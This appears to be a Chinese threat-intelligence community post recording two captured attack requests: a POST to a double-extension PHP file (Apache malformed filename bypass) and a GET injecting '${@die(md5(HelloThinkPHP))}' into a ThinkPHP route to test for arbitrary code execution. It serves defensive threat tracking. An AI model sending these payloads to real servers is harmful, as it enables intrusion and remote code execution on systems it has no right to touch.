web应用漏洞利用
Apache畸形本地文件名安全绕过漏洞&ThinkPHP框架执行任意代码漏洞利用
匿名用户 2019-12-26 10:37:47 645人浏览

数据包内容

REQUEST:

POST /jsc.php.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0

Host: 

Content-Length: 18

Connection: Keep-Alive

Cache-Control: no-cache

数据包内容

REQUEST:

GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0

Host: 

Connection: Keep-Alive

Cache-Control: no-cache

ip地址(6) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
luolin6888 2019-12-28 00:08:03 回复
厉害哦
奖励计划banner
今日推荐